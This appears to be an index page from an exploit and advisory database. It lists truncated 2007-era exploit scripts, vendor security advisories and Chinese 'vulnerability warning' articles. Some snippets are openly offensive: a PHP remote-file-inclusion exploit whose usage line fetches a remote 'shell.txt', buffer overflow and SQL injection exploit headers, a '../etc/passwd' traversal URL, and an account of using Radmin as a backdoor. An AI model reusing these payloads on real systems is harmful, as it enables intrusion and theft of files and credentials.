mycms-exec.txt

!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argcNo new score set"; elseif $score $data $file1 = "snakescore.txt"; $file2 = "snakesetby.txt"; $file1h = fopen$file1, 'w' or die"can't open file"; $file2h = fopen$file2, 'w' or die"can't open file"...

Cross site scripting

Cross-site scripting XSS vulnerability in Apple Safari Beta 3.0.1 for Windows allows remote attackers to inject arbitrary web script or HTML via a web page that includes a windows.setTimeout function that is activated after the user has moved from the current page...

RHEL 5 : kernel (RHSA-2007:0347)

Updated kernel packages that fix security issues and bugs in the Red Hat Enterprise Linux 5 kernel are now available. This update has been rated as having important security impact by the Red Hat Security Response Team. The Linux kernel handles the basic functions of the operating system. These n...

mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion

!/usr/bin/php -q -d shortopentag=on cmd: a shell command ls -la Options: -pport: specify a port other than 80 -Pip:port: specify a proxy Example: php '.$argv0.' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80 shell.txt:...

3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow

/ 3proxyv0.5.3g: win32 service remote buffer overflow exploit. by: vade79/v9 [email protected] fakehalo/realhalo compile: gcc x3proxy-win32.c -o x3proxy-win32 syntax: ./x3proxy-win32 -pr -h host sumus homepage/url: http://3proxy.ru/ 3Proxy tiny free proxy server previously known as 3APA3A tiny...

cups security update

CentOS Errata and Security Advisory CESA-2007:0123 Updated CUPS packages that fix a security issue are now available for Red Hat Enterprise Linux 3, 4, and 5. This update has been rated as having moderate security impact by the Red Hat Security Response Team. The Common UNIX Printing System CUPS...

rps62-sql.txt

? //RPS 6.2 SQL Injection Exploit //http://www.rps-project.com/ //Need magicquotesgpc = Off; //by s0cratex //Contact: s0cratexathotmaildotcom //Salu2: rgod, 0pt1x 'n mechas. errorreporting0; iniset"maxexecutiontime",0; iniset"defaultsockettimeout",5; $host = "localhost"; $path="/rps"; $id=1; echo...

Mandrake Linux Security Advisory : php (MDKSA-2007:048)

A number of vulnerabilities were discovered in PHP language. Many buffer overflow flaws were discovered in the PHP session extension, the strreplace function, and the imapmailcompose function. An attacker able to use a PHP application using any of these functions could trigger these flaws and...

DEBIAN-CVE-2007-0539

The wpremotefopen function in WordPress before 2.1 allows remote attackers to cause a denial of service bandwidth or thread consumption via pingback service calls with a source URI that corresponds to a large file, which triggers a long download session without a timeout constraint...

WebText 0.4.5.2 - Remote Code Execution

WebText 0.4.5.2 - Remote Code Execution DEVIL TEAM IRC: irc.milw0rm.com:6667 devilteam http://www.rahim.webd.pl/ ======== Contact: [email protected] cod3d by Kacper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=...

Netref 4 - 'cat_for_aff.php' Source Code Disclosure

option.php Reader 'Script Name: Netref 4 catforaff.php Source Code Disclosure 'Coded by : ajann 'Author : ajann 'Contact : : 'ExploitName: exploit4.asp 'Note : exploit file name =exploit4.asp 'Note : http://target/path/script/catforaff.php?addirect=../etc/passwd |etc... 'Using : Write Target afte...

YapBB <= 1.2 Beta2 (yapbb_session.php) Remote File Include Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+:...

Radmin service end to maintain the connection constantly problem analysis and solving-vulnerability warning-the black bar safety net

1, A description of the problem Radmin is a good remote control software, used to do a springboard back door could not be better, but each is connected through the springboard, look at the springboard connection, you can still see us, and a springboard for on Radmin connections, just shown as...

forumv04c.txt

!/usr/bin/perl Affected.scr..: µforum v0.4c Poc.ID........: 08060901 Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file Risk.level....: Medium Vendor.Status.: Unpatched Src.download..: comscripts.com/scripts/php.forum.1568.html Poc.link......:...

PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion

source: https://www.securityfocus.com/bid/19840/info PHP-Proxima is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary local files from the vulnerable system in the context of the...

RHEL 3 / 4 : httpd (RHSA-2006:0619)

Updated Apache httpd packages that correct security issues and resolve bugs are now available for Red Hat Enterprise Linux 3 and 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team. The Apache HTTP Server is a popular Web server available for fre...

XMB 1.9.6 Final - 'basename()' Remote Command Execution

!/usr/bin/php -q -d shortopentag=on ? echo "XMB = 1.9.6 Final basename 'langfilenew' arbitrary local inclusion / remote commands xctn\n"; echo "by rgod [email protected]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork: "Powered by XMB"\n\n"; / works regardless of php.ini settings /...

mole.com.ua Booking Script

Booking Script. Homepage: http://www.mole.com.ua PError with full path disclosure and possible buffer overflow?: http://www.example.com/week.php?year=2006&month=06&day=0' Warning: checkdate expects parameter 2 to be long, string given in...

Kaspersky Antivirus content filtering protection bypass

Small reassembly timeout during stateful filtering allows filtering bypass by breaking stream with pauses...

session spoofing and password theft probe-vulnerability warning-the black bar safety net

session spoofing article first briefly about the General asp system of the authentication principle. In General, the backend administrator login page enter the account password, the program will take him to submit a user name and password to the database administrator table to find if there is th...